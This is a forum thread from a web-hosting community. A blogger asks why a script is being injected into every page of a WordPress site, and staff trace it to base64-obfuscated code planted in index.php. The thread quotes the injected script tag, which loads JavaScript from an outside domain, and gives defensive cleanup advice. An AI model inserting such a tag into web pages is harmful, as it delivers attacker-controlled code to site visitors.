Site hacked? Or x10hosting adding javascript to my site?

Status
Not open for further replies.

k0nc3ptz

Reaction score
I'm not sure what's going on? Either I've been hacked or x10hosting is running some ads on my site because it's disturbing my feeds. I run a blog for personal use so very highly unlikely that I've attracted the "wrong" kind of people. Here's the link to my blog: http://www.konceptz.tk, and if you click on RSS you'll realize there's a problem on line 118.

The script being added to every page on my site is:
Code:
<script type="text/rocketscript" data-rocketsrc="http://organicfoodmarkets.com.au/release.js"></script><script type="text/rocketscript" data-rocketsrc="http://organicfoodmarkets.com.au/release.js"></script>

Please someone just confirm this or shed some light on this issue, any help is appreciated. Thanks

george21

X10Hosting Fanatic
Prime Account
Reaction score
X10 wouldn't do that. I had something similar like this happen on my site, I'm yet to determine the cause. If I were you, I would change all your passwords (cPanel, WordPress, FTP, everything related to your site), remove the code and wait to see if it re-appears. If it does, there is a possibility you've been infected.

k0nc3ptz

Reaction score
thanks for your help. So if I had to remove the script I'd have to search through every file on my site? That seems like a big pain, is there any easier or alternative method to remove the script?

descalzo

Grim Squeaker
Community Support
Reaction score
Disable all your plugins.
Tell CloudFlare to stop caching your site.
Add plugins back, one at a time.
Find where the script tags reappear.

k0nc3ptz

Reaction score
Very interesting, after I disabled all my plugins, paused cloudflare and cleared my cache. The junk element at bottom of all my pages don't say rocketscripts anymore but now say javascript... Any ideas?

descalzo

Grim Squeaker
Community Support
Reaction score
Where did you get your copy of WordPress?

Where did you get the theme?

k0nc3ptz

Reaction score
I made the theme myself using SiteGrinder, and the wordpress I just installed with cPanel.

Livewire

Abuse Compliance Officer
Staff member
Reaction score
Your wordpress install is compromised; if you check the bottom of your wordpress's index.php in file manager, there's some "eval base64_decode" stuff - that does NOT come in a stock install.

If you've already got a databaes backup, great - remove the entire install and reinstall it from a fresh wordpress zip file downloaded from the wordpress homepage. If you don't, make one and THEN do an erase-reinstall.

The best advice was also already given for what to do after that - update all your passwords and don't re-use the same ones for the Admin pass on Wordpress when reinstalling it this round.

k0nc3ptz

Reaction score
Alright, seems like the best option left to try. Thanks everyone for helping out, much appreciated.

Reaction score
Hi,

If you check your website's logs you will see that it will be constantly "probed" by malicious scripts

in order to find vulnerabilities provided or found in some software-packages like WP, and others.

Best Regards,
Javier

Status
Not open for further replies.